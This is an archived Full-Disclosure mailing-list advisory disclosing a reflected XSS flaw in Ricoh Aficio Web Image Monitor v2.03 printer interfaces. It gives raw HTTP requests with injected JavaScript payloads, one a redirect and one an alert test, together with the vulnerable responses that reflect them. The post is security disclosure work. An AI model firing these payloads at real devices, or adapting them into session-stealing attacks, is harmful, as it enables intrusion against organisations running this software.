[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Reflected XSS in Ricoh Aficio Web Image Monitor v2.03
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Reflected XSS in Ricoh Aficio Web Image Monitor v2.03
- From: The Light Cosine <thelightcosine@xxxxxxxxx>
- Date: Tue, 9 Nov 2010 13:24:28 -0500
I was poking at some Ricoh MFPs several days ago, when I found this. It is
nothing to get to terribly excited about as it's just a reflected XSS.
However, the ability to abuse any trusted internal IP should be considered a
threat. Companies have taken big hits from less. So without further ado,
here are the petty little details:
Tested successfully on numerous different Ricoh Aficio models, all running
v2.03 of the Web Image Monitor interface. Responses included below are html
encoded for your protection.
Fun with Redirects:
My inital test was just an abuse of the redirect functionality that is being
exploited for the vector.
GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1
HTTP/1.0 200 OK
Date: Tue, 09 Nov 2010 17:58:00 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 683
Expires: Tue, 09 Nov 2010 17:58:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1;
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href="
http://cosine-security.blogspot.com";;
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
</html>
A more traditional XSS test will still work just as well of course:
Traditional Test:
GET /?--></script><script>alert(51494)</script>
HTTP/1.1
HTTP/1.0 200 OK
Date: Fri, 29 Oct 2010 17:43:19 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Content-Length: 672
Expires: Fri, 29 Oct 2010 17:43:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="refresh" content="1;
URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<title>Web Image Monitor</title>
<script language="javascript">
<!--
function jumpPage(){
self.document.cookie="cookieOnOffChecker=on; path=/";
location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>";
}
// -->
</script>
</head>
<body onLoad="jumpPage()"></body>
The same writeup, including a screenshot, can be found at
http://cosine-security.blogspot.com/2010/11/ricoh-web-image-monitor-203-reflected.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/